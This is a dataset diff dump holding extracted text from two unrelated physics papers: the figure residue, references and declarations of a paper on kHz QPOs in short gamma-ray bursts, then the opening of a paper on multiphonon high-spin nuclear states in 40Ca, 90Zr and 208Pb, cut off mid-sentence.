+ 0
2236
+ 10
2237
+ 20
2238
+ 30
2239
+
2240
+
2241
+
2242
+
2243
+
2244
+
2245
+
2246
+ d
2247
+ GRB931101B
2248
+ energy channel 1
2249
+ 0
2250
+ 10
2251
+ 20
2252
+ 30
2253
+
2254
+
2255
+
2256
+
2257
+
2258
+
2259
+
2260
+ energy channel 2
2261
+ 0
2262
+ 10
2263
+ 20
2264
+ 30
2265
+
2266
+
2267
+
2268
+
2269
+
2270
+
2271
+
2272
+ counts
2273
+ energy channel 3
2274
+ 0
2275
+ 10
2276
+ 20
2277
+ 30
2278
+
2279
+
2280
+
2281
+
2282
+
2283
+
2284
+
2285
+ energy channel 4
2286
+ 0
2287
+ 20
2288
+ 40
2289
+ 0
2290
+ 20
2291
+ 40
2292
+ 60
2293
+ 80
2294
+ 100 120
2295
+ time (ms)
2296
+ total
2297
+ 0
2298
+ 4
2299
+ 8
2300
+ 12
2301
+
2302
+
2303
+
2304
+
2305
+
2306
+ b
2307
+ GRB910711
2308
+ energy channel 1
2309
+ 0
2310
+ 4
2311
+ 8
2312
+ 12
2313
+
2314
+
2315
+
2316
+
2317
+
2318
+ energy channel 2
2319
+ 0
2320
+ 4
2321
+ 8
2322
+ 12
2323
+
2324
+
2325
+
2326
+
2327
+
2328
+ power
2329
+ energy channel 3
2330
+ 0
2331
+ 4
2332
+ 8
2333
+ 12
2334
+
2335
+
2336
+
2337
+
2338
+
2339
+ energy channel 4
2340
+ 0
2341
+ 4
2342
+ 8
2343
+ 12
2344
+
2345
+
2346
+
2347
+
2348
+
2349
+ total
2350
+ 0
2351
+ 4
2352
+ 8
2353
+ 12
2354
+
2355
+
2356
+
2357
+
2358
+
2359
+ e
2360
+ GRB931101B
2361
+ energy channel 1
2362
+ 0
2363
+ 4
2364
+ 8
2365
+ 12
2366
+
2367
+
2368
+
2369
+
2370
+
2371
+ energy channel 2
2372
+ 0
2373
+ 4
2374
+ 8
2375
+ 12
2376
+
2377
+
2378
+
2379
+
2380
+
2381
+ power
2382
+ energy channel 3
2383
+ 0
2384
+ 4
2385
+ 8
2386
+ 12
2387
+
2388
+
2389
+
2390
+
2391
+
2392
+ energy channel 4
2393
+ 0
2394
+ 4
2395
+ 8
2396
+ 12
2397
+ 1000
2398
+ 2000
2399
+ 3000
2400
+ 4000
2401
+ 5000
2402
+ frequency (Hz)
2403
+ total
2404
+ c
2405
+ energy channel 1
2406
+ frequency (Hz)
2407
+ 1
2408
+ 2
2409
+ 3
2410
+ 4
2411
+ 0
2412
+ 1
2413
+ 2
2414
+ 3
2415
+ 4
2416
+ 5
2417
+ 6
2418
+ 7
2419
+ 8
2420
+ power
2421
+ GRB910711
2422
+ energy channel 2
2423
+ frequency (Hz)
2424
+ 1
2425
+ 2
2426
+ 3
2427
+ 4
2428
+ energy channel 3
2429
+ frequency (Hz)
2430
+ 1
2431
+ 2
2432
+ 3
2433
+ 4
2434
+ frequency (kHz)
2435
+ energy channel 4
2436
+ frequency (Hz)
2437
+ 1
2438
+ 2
2439
+ 3
2440
+ 4
2441
+ total
2442
+ frequency (Hz)
2443
+ 1
2444
+ 2
2445
+ 3
2446
+ 4
2447
+ f
2448
+ energy channel 1
2449
+
2450
+
2451
+
2452
+
2453
+
2454
+
2455
+
2456
+ 1
2457
+ 2
2458
+ 3
2459
+ 4
2460
+ GRB931101B
2461
+ energy channel 2
2462
+
2463
+
2464
+
2465
+
2466
+
2467
+
2468
+
2469
+ 1
2470
+ 2
2471
+ 3
2472
+ 4
2473
+ energy channel 3
2474
+
2475
+
2476
+
2477
+
2478
+
2479
+
2480
+
2481
+ 1
2482
+ 2
2483
+ 3
2484
+ 4
2485
+ frequency (kHz)
2486
+ energy channel 4
2487
+
2488
+
2489
+
2490
+
2491
+
2492
+
2493
+
2494
+ 1
2495
+ 2
2496
+ 3
2497
+ 4
2498
+ total
2499
+ 0
2500
+ 20
2501
+ 40
2502
+ 60
2503
+ 80
2504
+ 100 120
2505
+ time (ms)
2506
+ 1
2507
+ 2
2508
+ 3
2509
+ 4
2510
+ Extended Data Fig.
2511
+ 7 | Energy dependence of burst properties. a, Light curves of GRB 910711, in each of the
2512
+ four BATSE TTE channels and combined, over the segment of data (0.131072 s) that contains our strong signal. We see that
2513
+ the higher-energy channels 3 and 4 have greater flux relative to the pre-burst background than the lower-energy channels 1
2514
+ and 2. b, The power spectra of GRB 910711, in each of the four BATSE TTE energy channels and combined. The energy
2515
+ ranges are 20 − 50 keV, 50 − 100 keV, 100 − 300 keV, and > 300 keV for channels 1, 2, 3, and 4, respectively. The vertical
2516
+ dotted lines show the centroid frequencies of the QPOs we identify in the summed channel 3 and 4 data (see Extended
2517
+ Data Table 5). c, The spectrogram of GRB 910711, in each energy channel separately as well as in all channels combined,
2518
+ using the same intervals as in Figure 4. The color bar on top of each set of plots shows the power scale. The distribution of
2519
+ power, in time and frequency, is complicated. The black arrows indicate the mean values of the QPO frequencies given in
2520
+ Table 1. In some cases (e.g., energy channel 3) there may be evidence for significant power prior to the main burst. d, e,
2521
+ f, The same plots for GRB 931101B.
2522
+
2523
+ Springer Nature 2021 LATEX template
2524
+ kHz QPOs in sGRBs
2525
+ 19
2526
+ [49] Lien, A. et al. The Third Swift Burst Alert
2527
+ Telescope Gamma-Ray Burst Catalog. Astro-
2528
+ phys. J. 829 (1), 7 (2016).
2529
+ [50] https://fermi.gsfc.nasa.gov/ssc/data/p7rep/
2530
+ analysis/scitools/gbm grb analysis.html
2531
+ [51] https://heasarc.gsfc.nasa.gov/FTP/
2532
+ compton/data/batse/ascii data/batse tte/
2533
+ [52] https://heasarc.gsfc.nasa.gov/W3Browse/
2534
+ all/batse3b.html
2535
+ [53] Leahy, D. A. et al. On searches for pulsed
2536
+ emission with application to four globular
2537
+ cluster X-ray sources : NGC 1851, 6441, 6624
2538
+ and 6712. Astrophys. J. 266, 160–170 (1983).
2539
+ [54] Goodman, J. & Weare, J.
2540
+ Ensemble sam-
2541
+ plers with affine invariance. Communications
2542
+ in Applied Mathematics and Computational
2543
+ Science 5 (1), 65–80 (2010).
2544
+ [55] H¨ubner, M., Huppenkothen, D., Lasky, P. D.
2545
+ & Inglis, A. R.
2546
+ Pitfalls of Periodograms:
2547
+ The Nonstationarity Bias in the Analysis
2548
+ of Quasiperiodic Oscillations. Astrophys. J.
2549
+ Suppl. 259 (2), 32 (2022).
2550
+ [56] Paciesas, W. S. et al.
2551
+ The Fourth BATSE
2552
+ Gamma-Ray Burst Catalog (Revised). Astro-
2553
+ phys. J. Suppl. 122 (2), 465–495 (1999).
2554
+ [57] Burns, E. et al. Identification of a Local Sam-
2555
+ ple of Gamma-Ray Bursts Consistent with a
2556
+ Magnetar Giant Flare Origin. Astrophys. J.
2557
+ Lett. 907 (2), L28 (2021).
2558
+ [58] D´alya, G. et al. GLADE: A galaxy catalogue
2559
+ for multimessenger searches in the advanced
2560
+ gravitational-wave detector era.
2561
+ Mon. Not.
2562
+ R. Astron. Soc. 479 (2), 2374–2381 (2018).
2563
+ [59] D´alya, G. et al.
2564
+ GLADE+: An Extended
2565
+ Galaxy
2566
+ Catalogue
2567
+ for
2568
+ Multimessenger
2569
+ Searches with Advanced Gravitational-wave
2570
+ Detectors.
2571
+ arXiv e-prints arXiv:2110.06184
2572
+ (2021).
2573
+ [60] Meegan, C. A. et al.
2574
+ The Third BATSE
2575
+ Gamma-Ray Burst Catalog.
2576
+ Astrophys. J.
2577
+ Suppl. 106, 65 (1996).
2578
+ [61] Karachentsev, I. D., Karachentseva, V. E.,
2579
+ Huchtmeier, W. K. & Makarov, D. I.
2580
+ A
2581
+ Catalog of Neighboring Galaxies. Astron. J.
2582
+ 127 (4), 2031–2068 (2004).
2583
+ [62] Bauswein, A. & Janka, H. T.
2584
+ Measuring
2585
+ Neutron-Star Properties via Gravitational
2586
+ Waves from Neutron-Star Mergers.
2587
+ Phys.
2588
+ Rev. Lett. 108 (1), 011101 (2012).
2589
+ [63] Rosofsky, S. G., Gold, R., Chirenti, C.,
2590
+ Huerta, E. A. & Miller, M. C. Probing neu-
2591
+ tron star structure via f -mode oscillations
2592
+ and damping in dynamical spacetime models.
2593
+ Phys. Rev. D 99 (8), 084024 (2019).
2594
+ [64] van der Klis, M. et al.
2595
+ Discovery of Sub-
2596
+ millisecond Quasi-periodic Oscillations in the
2597
+ X-Ray Flux of Scorpius X-1. Astrophys. J.
2598
+ Lett. 469, L1 (1996).
2599
+ [65] Grefenstette, B. W., Smith, D. M., Dwyer,
2600
+ J. R. & Fishman, G. J.
2601
+ Time evolution of
2602
+ terrestrial gamma ray flashes.
2603
+ Geophysical
2604
+ Research Letters 35 (6), L06802 (2008).
2605
+ Declarations
2606
+ Acknowledgments.
2607
+ We thank Brad Cenko,
2608
+ Alessandra Corsi, Liz Hays, Fred Lamb, Jay Nor-
2609
+ ris, Luciano Rezzolla, Nikhil Sarin, David Shoe-
2610
+ maker and Zorawar Wadiasingh for discussions.
2611
+ C. C. acknowledges support by NASA under
2612
+ award numbers 80GSFC17M0002 and TCAN-
2613
+ 80NSSC18K1488. M. C. M. was supported in part
2614
+ by NASA ADAP grant 80NSSC21K0649. This
2615
+ work was partially conducted at the Aspen Center
2616
+ for Physics, which is supported by National Sci-
2617
+ ence Foundation grant PHY-1607611. Resources
2618
+ supporting this work were provided by the NASA
2619
+ High-End Computing (HEC) Program through
2620
+ the NASA Center for Climate Simulation (NCCS)
2621
+ at Goddard Space Flight Center.
2622
+ Authors’ Contributions.
2623
+ C.C. led the project
2624
+ based on her idea of the possibility of a signal. S.D.
2625
+ extracted the Fermi/GBM data and performed
2626
+ the galaxy host search. A.L. extracted the Swift/-
2627
+ BAT data and identified cosmic ray contamination
2628
+ in that data. M.C.M. obtained the BATSE data
2629
+ and performed most of the data analysis. R.P. pro-
2630
+ vided expertise about possible systematic errors
2631
+
2632
+ Springer Nature 2021 LATEX template
2633
+ 20
2634
+ kHz QPOs in sGRBs
2635
+ in the BATSE data. All authors contributed ideas
2636
+ to the manuscript.
2637
+ Competing interests.
2638
+ The authors declare no
2639
+ competing interests (financial or non-financial).
2640
+ Author
2641
+ information.
2642
+ Correspondence
2643
+ and
2644
+ requests for materials should be addressed to
2645
+ chirenti@umd.edu
2646
+
99E1T4oBgHgl3EQfCgIZ/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
99FAT4oBgHgl3EQfqB0k/content/tmp_files/2301.08643v1.pdf.txt ADDED
@@ -0,0 +1,2307 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ Multiphonon structure of high-spin states in 40Ca, 90Zr, and 208Pb
2
+ N. Lyutorovich and V. Tselyaev
3
+ St.
4
+ Petersburg State University, St.
5
+ Petersburg, 199034, Russia
6
+ (Dated: January 23, 2023)
7
+ The method of description of the high-spin states, which was previously developed and applied
8
+ for the states of this type in 208Pb, is generalized for the case of the states having more complex
9
+ multiphonon structure. In this method, the harmonic approximation with the renormalized phonons
10
+ is used in which the phonons themselves are determined within the non-linear version of the model
11
+ based on the random-phase approximation (RPA) and including both the RPA correlations and the
12
+ beyond-RPA ones. The mean field and the residual interaction are derived within the framework
13
+ of the self-consistent RPA from the energy-density functional of the Skyrme type. The method is
14
+ applied for the analysis of the available experimental data in doubly magic 208Pb and 40Ca and in
15
+ semi-magic 90Zr.
16
+ I.
17
+ INTRODUCTION
18
+ High-spin states in nuclei have been the subject of
19
+ the experimental and theoretical investigations for a long
20
+ time (see reviews [1–3]) and continue to be a topic of
21
+ current interest, see, e.g., Refs.
22
+ [4–9].
23
+ The most part
24
+ of the data on the high-spin states refers to the non-
25
+ magic nuclei, however the recent experiments and the-
26
+ oretical analysis show that there are also long series of
27
+ high-spin states in magic and semi-magic nuclei [10–18].
28
+ At present, the high-spin states have been experimen-
29
+ tally identified only in two doubly-magic nuclei, 208Pb
30
+ and 40Ca, and in the semi-magic nucleus 90Zr. The first
31
+ observation of high-spin states in these nuclei has been
32
+ made in 90Zr in Ref. [19] where the states up to spin
33
+ I = 20 were investigated and the shell-model (SM) cal-
34
+ culations were performed. The large-scale SM calcula-
35
+ tions for rotational bands in 90Zr were also presented
36
+ in Refs. [18, 20] where previous experiments and calcu-
37
+ lations are also reviewed. At the same time, the close
38
+ coexistence of spherical states having n-particle–n-hole
39
+ (npnh) configuration structure with deformed and su-
40
+ perdeformed rotational bands in magic and semi-magic
41
+ nuclei significantly complicates their theoretical descrip-
42
+ tion.
43
+ Experimental and theoretical studies of 40Ca nucleus
44
+ show a very complex structure of its excited states, where
45
+ the spherical states and approximately five rotational
46
+ bands, including normally deformed (ND) and superde-
47
+ formed (SD) bands, exist [11, 13, 16, 21]. The studies
48
+ show that the first and the second 0+ excited states in
49
+ this nucleus, i.e.
50
+ ND and SD band-heads, have 4p4h
51
+ and 8p8h configuration structures, respectively. Calcu-
52
+ lations for the ND and SD bands were performed in the
53
+ cranked relativistic mean-field [11] and cranked HF or
54
+ HFB [12, 16, 22] models. The SD-band properties were
55
+ also studied in the framework of the cranking covariant
56
+ density functional theory with pairing in the shell-model-
57
+ like approach with conserved particle numbers [17]. The
58
+ transition (not band-head) energies and quadrupole mo-
59
+ ments of the ND and SD bands were well reproduced in
60
+ the large-scale SM calculations in Ref. [13].
61
+ It should
62
+ be noted that, in all these methods, calculations overes-
63
+ timate the energy of the ND and SD band-head states.
64
+ However, besides the ND and SD bands, there are many
65
+ other states in 40Ca which have not yet been described
66
+ within the microscopic approach.
67
+ The doubly magic 208Pb is of particular interest since
68
+ many high-spin states have been experimentally assigned
69
+ in this nucleus and since it is a conventional laboratory to
70
+ test the theory. Very important new experimental data
71
+ for 208Pb up to spin I = 30 together with a theoretical
72
+ analysis in the framework of the SM have been presented
73
+ in Ref. [15]. The advantage of the SM calculations is that
74
+ they allow one to take into account many complex con-
75
+ figurations. However, the model of Ref. [15] is not self-
76
+ consistent in particular because the single-particle (sp)
77
+ energies used in the calculations were adjusted to repro-
78
+ duce the experimental spectra of the neighboring odd
79
+ nuclei.
80
+ The self-consistent description of the high-spin states
81
+ in 208Pb has been presented in Ref. [23] within the renor-
82
+ malized time-blocking approximation (RenTBA) devel-
83
+ oped in Ref. [24]. The RenTBA is the non-linear ver-
84
+ sion of the model based on the random-phase approxi-
85
+ mation (RPA) and including both the RPA correlations
86
+ and the beyond-RPA ones. The main configuration space
87
+ of the RenTBA consists of the 1p1h and 1p1h ⊗ phonon
88
+ configurations where the phonons are determined self-
89
+ consistently from the non-linear RenTBA equations and
90
+ thus include correlations beyond the RPA. The more
91
+ complex configurations are included in the RenTBA in
92
+ part due to the ground-state correlations (of the RPA
93
+ type) and the non-linear effects (see [24] for more de-
94
+ tails). In Ref. [23] it was obtained that the uncoupled
95
+ 1p1h ⊗ phonon configurations are rather good approxi-
96
+ mation for the high-spin states in 208Pb. However, in this
97
+ model the correlations between the 1p1h components of
98
+ the 1p1h ⊗ phonon configurations are neglected. The in-
99
+ clusion of these correlations means the replacement of the
100
+ 1p1h ⊗ phonon configurations with the phonon⊗ phonon
101
+ ones. The results of Ref. [23] show that the effect of this
102
+ replacement can be noticeable. One can expect that this
103
+ effect will increase at the increase of the spin of the state
104
+ resulting in the increase of its configuration complexity.
105
+ The most elaborated approach in which the mul-
106
+ arXiv:2301.08643v1 [nucl-th] 20 Jan 2023
107
+
108
+ 2
109
+ tiphonon configurations are included explicitly is the
110
+ quasiparticle-phonon model (QPM) of Soloviev and co-
111
+ workers (see [25–28] and references therein and also Refs.
112
+ [29, 30] where the self-consistent version of this model was
113
+ developed).
114
+ In the QPM, the interaction between the
115
+ phonons is taken into account, but the phonons are de-
116
+ termined as the solutions of the RPA or the quasiparticle
117
+ RPA equations. More recently, the multiphonon models
118
+ were developed in Refs.
119
+ [31–33] within the framework
120
+ of an equation of motion phonon method (EMPM), in
121
+ which the phonons are introduced in the Tamm-Dancoff
122
+ approximation, and in Ref. [34] within the covariant nu-
123
+ clear response theory based on the relativistic quasiparti-
124
+ cle time-blocking approximation. However, to our knowl-
125
+ edge, these models including QPM were not applied to
126
+ the study of the multiphonon high-spin states.
127
+ Consistent multiphonon model should certainly takes
128
+ into account interaction between the phonons and re-
129
+ strictions imposed by the Pauli principle. The phonon-
130
+ phonon interaction is especially important in the models
131
+ in which the phonon basis is fixed as it takes place, e.g.,
132
+ in the QPM and EMPM. In this case the phonon-phonon
133
+ interaction can affect the properties of both multiphonon
134
+ and one-phonon states, in particular, their energies. In
135
+ the method used in Ref. [23], the effect of the phonon-
136
+ phonon interaction on the one-phonon states is incor-
137
+ porated by means of the phonon renormalization within
138
+ the RenTBA. The effect of this interaction on the two-
139
+ phonon high-spin states (composed of the renormalized
140
+ phonons) was found to be small by comparing the ener-
141
+ gies of the pure 1p1h ⊗ phonon configurations with the
142
+ results of the full-scale RenTBA calculations.
143
+ The goal of the present paper is to extend the method
144
+ of Ref. [23] to the high-spin states having multiphonon
145
+ structure. The calculation scheme is fully self-consistent
146
+ and is based on the energy-density functional (EDF) of
147
+ the Skyrme type.
148
+ Calculations are performed for the
149
+ high-spin states in 40Ca, 90Zr, and 208Pb. The results
150
+ are compared with available experimental data.
151
+ II.
152
+ THEORETICAL FRAMEWORK AND
153
+ CALCULATION SCHEME
154
+ Our approach is based on the harmonic approxima-
155
+ tion with the renormalized phonons.
156
+ Thus, the basic
157
+ elements of the theory are the phonons which are de-
158
+ termined within the RenTBA. The RenTBA (see [24] for
159
+ more details) is a non-linear version of the time-blocking
160
+ approximation which is a model of the extended RPA
161
+ type including 1p1h⊗phonon configurations on top of the
162
+ configurations incorporated in the RPA. The renormal-
163
+ ized phonons are described by the solutions of the (non-
164
+ linear) RenTBA equations and therefore include 1p1h,
165
+ 1p1h ⊗ phonon, and more complex configurations result-
166
+ ing from the non-linear effects. As was shown in [24, 35],
167
+ the renormalization reduces the energies of the phonons
168
+ as compared to their RPA values that usually decreases
169
+ discrepancy with the experiment in the case of the self-
170
+ consistent scheme based on the Skyrme EDFs, see Tables
171
+ VII–IX in the Appendix. The harmonic approximation
172
+ means that the interaction between 1p1h and more com-
173
+ plex configurations is taken into account in the renormal-
174
+ ized phonons (having relatively low energies) but not be-
175
+ tween them in the multiphonon configurations at higher
176
+ energies and thus the energy of the multiphonon state is
177
+ determined as a simple sum of the energies of the renor-
178
+ malized phonons. In what follows, we call this approach
179
+ the multiphonon model in the harmonic approximation,
180
+ or, for brevity, the multiphonon model. To minimize vi-
181
+ olation of the Pauli principle in the multiphonon con-
182
+ figurations we use a simple method in which incompat-
183
+ ible phonon combinations are excluded with the help of
184
+ the numerical analysis of the 1p1h structure of the main
185
+ (RPA) components of the phonons.
186
+ The technical details of the calculations are the fol-
187
+ lowing. The single-particle (s.p.) basis and residual in-
188
+ teraction were calculated by the variational method for
189
+ the Skyrme EDF as described in Ref. [36]. At the first
190
+ step, the phonons are calculated in the RPA and, at the
191
+ second step, they are self-consistently optimized in the
192
+ RenTBA that implies the solution of the system of non-
193
+ linear equations [24].
194
+ In the calculations, the Skyrme EDF with the param-
195
+ eter set SV-bas−0.44 was used. This set were obtained
196
+ in Ref. [35] on the base of the parametrization SV-bas
197
+ [37] to reproduce the basic experimental characteristics
198
+ of the M1 excitations in 208Pb within the RenTBA and
199
+ at the same time to describe the nuclear ground-state
200
+ properties with approximately the same accuracy as the
201
+ original SV-bas set.
202
+ Wave functions and fields were represented on a spher-
203
+ ical grid in coordinate space.
204
+ The s.p.
205
+ basis was dis-
206
+ cretized by imposing box boundary condition with a box
207
+ radius equal to 18 fm. The particle’s energies εp were
208
+ limited by the maximum value εmax
209
+ p
210
+ = 100 MeV. The
211
+ details of solving the non-linear RenTBA equations are
212
+ described in Ref. [35].
213
+ III.
214
+ RESULTS AND DISCUSSION
215
+ The high-spin states are in the energy region where
216
+ the level density is high, so there may be uncertainties
217
+ in comparing the theoretical values with the data. The
218
+ uncertainties are not very essential in the given investi-
219
+ gation because we consider only low levels for every spin
220
+ and parity. For 208Pb and 90Zr, we study yrast, yrare,
221
+ and those additional levels for which experimental data
222
+ are available.
223
+ For 40Ca, where both spherical and de-
224
+ formed states are known, we investigate all the states
225
+ excluding the ND and SD rotational bands because the
226
+ method can not describe the states having a large defor-
227
+ mation. At the same time, for 40Ca and 90Zr, we also
228
+ considered states with low spins in order to give a com-
229
+ plete picture of the states in these nuclei. The number
230
+
231
+ 3
232
+ of known low-spin states in 208Pb is very large, so they
233
+ deserve a separate study which goes beyond the scope of
234
+ this article.
235
+ A.
236
+ 208Pb
237
+ The results for the high-spin states in 208Pb and a com-
238
+ parison with available data are presented in Tables I (pos-
239
+ itive parity states) and II (negative parity states), where
240
